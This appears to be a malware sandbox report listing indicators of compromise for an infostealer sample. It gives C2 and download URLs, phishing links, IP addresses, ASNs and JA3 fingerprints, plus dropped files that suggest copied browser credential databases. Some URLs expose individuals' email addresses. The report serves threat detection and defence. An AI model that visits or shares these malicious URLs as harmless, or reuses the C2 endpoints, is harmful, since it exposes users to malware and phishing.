94.228.166.74	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	94.228.166.74/online/dl/0x3fg.exe
185.215.113.67	oMHveSc3hh.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	0KuDEDABFO.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	miOnrvnXK0.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	Rh74sODsWE.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	dSQUdo6EjO.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	usVhwck8lN.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	SecuriteInfo.com.W32.AIDetect.malware1.20102.exe	Get hash	malicious	Amadey	Browse	185.215.113.67/4dcYcWsw3/index.php
	MR98F1zzeo.exe	Get hash	malicious	Amadey Raccoon Vidar	Browse	185.215.113.67/4dcYcWsw3/index.php
	8f5718a6042061b23a4e42ee5cd8112946c135dc9d0c2.exe	Get hash	malicious	Amadey	Browse	185.215.113.67/4dcYcWsw3/index.php
	fC4T1vVs24.exe	Get hash	malicious	Amadey	Browse	umbrelladownload.uno/gp6GbqVce/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pixel.com	https://opposite-grandiose-flock.glitch.me/public/digitalapps.navyfederal.org.html	Get hash	malicious	HTMLPhisher	Browse	75.2.57.54
	SecuriteInfo.com.Win64.Malware-gen.9165.26289.exe	Get hash	malicious	Unknown	Browse	54.67.42.145
	SecuriteInfo.com.Win64.Malware-gen.9165.26289.exe	Get hash	malicious	Unknown	Browse	54.67.42.145
	https://rocketindustrial.workplace.com/nd/?aref=1718777513019498&medium=email&mid=61b37c9868598G5b018abaf68cG61b38131c886aG16b0&n_m=mfoley%40hardercorp.com&lloc=main_cta&rms=v2&irms=1	Get hash	malicious	Unknown	Browse	157.240.0.13
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	54.67.42.145
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	54.67.42.145
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	54.67.42.145
	https://www.canva.com/design/DAGIxlOtbP0/wg4kXFv68FVeiaUc7WfPPw/view?utm_content=DAGIxlOtbP0&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	75.2.57.54
	https://l.workplace.com/l.php?u=https%3A%2F%2Flookaside.fbsbx.com%2Ffile%2FInghams%2520-%2520Hi-Res%2520Masterbrand%2520Colour%2520Logo%2520-%2520Always%2520Good_RGB%2520%255Bfor%2520digital%252C%2520online%2520and%2520Microsoft%2520Templates%255D.png%3Ftoken%3DAWxzKoi1nUB59NvsJAG35rI9D0aOOyzrR_PTZAd9DoL6_qLIGf9zIjSF0JWeFwBB4O_Ex9BSSDzHo5Kc-z69kH5xLPrunP67a7Gg_gNW-IZBGfLtVAScC0_Soqass62EpFvp19XiZwu-t3SbdvFKIbgZiHYv8JwAt48eNPNNPAfegwBz5YiuOC_yzKaW8R-rRdChxANoqihf6uC5DIJ3fOo1WyrrQ9tWZzDlRSq6xEpAVmuFS8uJefBWRMb_IltKrzlL6mHESszRDv_-2U-tDs8BDe_sK3jcP69DmeOJ1slv_IcHHB7ZXVNpLIifBYllRdPB7vx7cskYHEr9dZA8Ett_mGslvGTxP7Va6mWs4_HfXSuJX1b3DyFUALoyx1iEPxeOtKd0bUO-VDSVuzsgmq-NgApAe1yeRTHf8dXIZ48Xfpi9YMnbssgSRMJM0fMVnMsvAaC0_VbZL9mBQ6AnwkTc%26__cid%3D612274792515426&h=AT1b5nA7SfQIC_f-JrcPE6qoQ868KN5q_fiMGwjmtCyuPJbOumUW-zhlOCc5WwzejzjZqbOmEK8tJb3Dtz3bFr2Jw8oCVw9vPPsbMAoOY6zVWgUUxKz5hA9ptrJbAfrtF3xuhlsFrbrhBAOhbr5I2pV8znFdu8WiMjbVAQ	Get hash	malicious	Unknown	Browse	157.240.0.13
	https://www.canva.com/design/DAGH7auLJhk/J8O7k7PopfnMFSHoCZmi3A/view	Get hash	malicious	HTMLPhisher	Browse	99.83.205.94
moreapp4you.online	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	31.31.196.208
moreapp4you.online	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	31.31.196.208
bit.ly	SecuriteInfo.com.Win64.Malware-gen.9165.26289.exe	Get hash	malicious	Unknown	Browse	67.199.248.11
	SecuriteInfo.com.Win64.Malware-gen.9165.26289.exe	Get hash	malicious	Unknown	Browse	67.199.248.10
	http://auspostparcel.top/	Get hash	malicious	Unknown	Browse	67.199.248.11
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	67.199.248.11
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	67.199.248.11
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	67.199.248.11
	CFEMail2000394003900390302.pdf	Get hash	malicious	Unknown	Browse	67.199.248.11
	https://qrco.de/bfARET	Get hash	malicious	Unknown	Browse	67.199.248.10
	https://bit.ly/4cuLfhr?aef=cZoZKtHfWe?qv=IHQgT9okXn	Get hash	malicious	Unknown	Browse	67.199.248.10
	http://bit.ly/e0Mw9w	Get hash	malicious	Unknown	Browse	67.199.248.11
iplogger.co	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	172.67.167.249
	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	104.21.82.93
	3qWvYGcbza.exe	Get hash	malicious	Unknown	Browse	172.67.188.178
	3qWvYGcbza.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	setup.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	YCImxTWoQs.exe	Get hash	malicious	RedLine	Browse	104.21.76.57
	w5ks798nGQ.exe	Get hash	malicious	RedLine	Browse	172.67.188.178
	NvOx95swMQ.exe	Get hash	malicious	RedLine	Browse	104.21.76.57
	9BCA6AE45D535FA0411A327DE8E385D524D510DA1C22C.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Vidar, zgRAT	Browse	172.67.188.178
	qqeng.pdf.lnk	Get hash	malicious	RHADAMANTHYS	Browse	104.21.76.57
github.com	Remittance advice 26b44723892edfbd6baf.eml	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3
	https://vjl.urj7z9q.com/VjL/	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	https://docs.google.com/presentation/d/e/2PACX-1vTxBgqg7dCOSaZSLN5pY9aNfjHRIitI17n4FtUD5p57W5eC0FJjtsHoXU0oAJ--8KMU50z8qn5Wsddo/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3
	https://7yntu.fqqydm.ru/7YnTU2/#Xxxxx.xxxx@xxxx.co.uk	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	Employee Benefits Enrollment for ryan.evans - ADP.pdf	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	https://searchflow.mf67x.com/b3bKZ9K0/#xxx.xxx@xxx.co.uk	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	X8ljh02lU9.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	185.172.128.33
	file.exe	Get hash	malicious	RedLine	Browse	185.172.128.33
	35WqOa1tGb.exe	Get hash	malicious	GCleaner, Nymaim	Browse	185.172.128.90
	DXe9Ayi7uC.exe	Get hash	malicious	GCleaner, Nymaim	Browse	185.172.128.69
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	185.172.128.116
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.116
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	185.172.128.116
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.33
	j3KmxDxlLT.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.172.128.116
	Vnn3qRKOxH.exe	Get hash	malicious	Atlantida Stealer, PureLog Stealer	Browse	185.172.128.95
NADYMSS-ASRU	X8ljh02lU9.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	185.172.128.33
	file.exe	Get hash	malicious	RedLine	Browse	185.172.128.33
	35WqOa1tGb.exe	Get hash	malicious	GCleaner, Nymaim	Browse	185.172.128.90
	DXe9Ayi7uC.exe	Get hash	malicious	GCleaner, Nymaim	Browse	185.172.128.69
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	185.172.128.116
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.116
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	185.172.128.116
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.33
	j3KmxDxlLT.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.172.128.116
	Vnn3qRKOxH.exe	Get hash	malicious	Atlantida Stealer, PureLog Stealer	Browse	185.172.128.95
WHOLESALECONNECTIONSNL	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	185.215.113.67
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.215.113.67
	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	185.215.113.67
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	185.215.113.67
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.215.113.67
	setup.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	185.215.113.67
	http://185.215.113.31:84/api/	Get hash	malicious	Unknown	Browse	185.215.113.31
	4TzzRzv0Hs.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.215.113.67
	KmhrN2q5ZO.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, zgRAT	Browse	185.215.113.67
	zM3MeU5Z5L.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
PRANET-ASRU	iYhvVk2ZzV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	94.228.166.75
	T4LJO0xbse.exe	Get hash	malicious	Quasar	Browse	94.228.166.40
	K3wj3nqr6c.exe	Get hash	malicious	Amadey	Browse	94.228.166.74
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	94.228.166.74
	CS32G1VhXR.exe	Get hash	malicious	Quasar	Browse	94.228.166.40
	ZXZMRvEA9M.elf	Get hash	malicious	Mirai	Browse	185.46.45.224
	2mim34IfQZ.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, Xmrig, zgRAT	Browse	94.228.162.82
	qk8WDvZhHH.exe	Get hash	malicious	RedLine	Browse	94.228.162.55
	huhu.mips.elf	Get hash	malicious	Mirai	Browse	185.46.45.214
	Update.js	Get hash	malicious	SocGholish	Browse	178.236.246.25

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://gtus365-my.sharepoint.com/personal/kristen_brill_us_gt_com/Access%20Requests/pendingreq.aspx?mbypass=1&ApproveAccessRequest=true&AccessRequestID=%7B4EE0BFC1-33C1-49DD-A800-4ADCF89CF283%7D	Get hash	malicious	Unknown	Browse	13.85.23.86
	http://viewtoday.co.za/wp-content/uploads/2019/08/afrihost-h-fc-rgb-01.png	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://caiwuunion-my.sharepoint.com/:b:/g/personal/legal_department_caiwu_org_uk/EUTCYzo0mLpEjSMjTfF3k3YBFC0pej7ROjPpY7fOEhyWUA?e=4%3aPs3uar&at=9	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86
	26_june_DY5204.pdf	Get hash	malicious	Unknown	Browse	13.85.23.86
	http://singlelogin.rs	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://msantamobs.com/wp-admin/user/correos.es/servicios.pagomente.es/pagomente/	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://liteblue-usps-gov.com/	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://jiedian.dadabing023.workers.dev/	Get hash	malicious	Unknown	Browse	13.85.23.86
	http://pub-811aa764a2a4480dbb9f3ca7ebab5a07.r2.dev/index.html	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://aradcofeenet1.aradcofeenet1.workers.dev/	Get hash	malicious	Unknown	Browse	13.85.23.86
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win64.RATX-gen.17621.16341.exe	Get hash	malicious	AgentTesla	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	LOADING ADVICE.exe	Get hash	malicious	AgentTesla	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	26_june_DY5204.pdf	Get hash	malicious	Unknown	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	MzMXVPEjdy.exe	Get hash	malicious	DCRat	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	mAJY4CrF1A.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	http://pub-811aa764a2a4480dbb9f3ca7ebab5a07.r2.dev/index.html	Get hash	malicious	Unknown	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	http://www.youkonew.anakembok.de/	Get hash	malicious	Unknown	Browse	31.31.196.208 67.199.248.11 54.67.42.145
	https://cloudflare-workers-pages-vless-2gi.pages.dev/	Get hash	malicious	Unknown	Browse	31.31.196.208 67.199.248.11 54.67.42.145
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Malware-Cryptor.Inject.gen.12012.10605.dll	Get hash	malicious	Unknown	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	SecuriteInfo.com.Malware-Cryptor.Inject.gen.12012.10605.dll	Get hash	malicious	Unknown	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	rSCAN31804.exe	Get hash	malicious	GuLoader, Remcos	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	FactuBoletaEletricidadCgeMAYO.msi_FactuBoletaEletricidadCgeMAYO.msi_49684.msi	Get hash	malicious	Unknown	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	data-sheet.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	DRAFT SHIPPING DOCUMENTS.exe	Get hash	malicious	GuLoader, Lokibot	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	8x121Y7FNW.js	Get hash	malicious	AveMaria, PrivateLoader	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	Enquiry_-_Dubai.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	DOC02357.BAT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	140.82.121.3 185.199.111.133 103.28.36.182
	RN5xE8pQN2.exe	Get hash	malicious	Vidar	Browse	140.82.121.3 185.199.111.133 103.28.36.182

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	AADJTHAWWR.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	wqmnYoVbHr.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	EZrw1nNIpG.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	KgXj6BW5dZ.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	T8TLibvQ1C.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	HWyC5T1f8a.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	DqnftBv2b9.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	Set-up.exe	Get hash	malicious	Amadey, Vidar, Xmrig	Browse
	75MwheiQ7I.exe	Get hash	malicious	Amadey	Browse
	ljwIPDSwFi.exe	Get hash	malicious	DarkGate, MailPassView, Vidar	Browse
C:\ProgramData\mozglue.dll	AADJTHAWWR.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	wqmnYoVbHr.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	EZrw1nNIpG.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse
	KgXj6BW5dZ.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	T8TLibvQ1C.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	HWyC5T1f8a.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	DqnftBv2b9.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	Set-up.exe	Get hash	malicious	Amadey, Vidar, Xmrig	Browse
	75MwheiQ7I.exe	Get hash	malicious	Amadey	Browse
	ljwIPDSwFi.exe	Get hash	malicious	DarkGate, MailPassView, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAKJKFHCAEGDHIDGDHDAKEGHCG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFBKFHIDHIIJJKECGHCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCBKFBFCGIEHIDGCFBFBFBKEBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7606669492253235
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBc5u3xOs5oqejsi8:TxFawNLopFgU10XJB0u3xOseqYsi8
MD5:	36B329292F9745F9F71FB49B022FBDA2
SHA1:	A99E0116004CE22F836D903E276B31AC342580A7
SHA-256:	744C0F07E10EDBBC0434C1F449E639101F15636AC6EF75FCF04836FB251A9B63
SHA-512:	5318FFF8C4D3201BDA19A97DB661D42F099754E56E1428B69B68EC163CC05B22AB5C9DF60AEE7DB0B790A87E0D4DA098FDA314D7B75D9A9A1AA71AAFD2B7C73A
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCGCBAECFCAKKEBFCFII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9370
Entropy (8bit):	5.514140640374404
Encrypted:	false
SSDEEP:	192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5:	7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1:	E5E6AC8676EE3761DAB13A10EB7573C19F48D297
SHA-256:	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512:	012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HDHCFIJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFIIIJJKJJKEBGIDGCAEGCGD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJEHJKJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEBKJDBAAKJDGCBFHCFCGIEBFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEGDAKEHJDHIDHJJDAEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
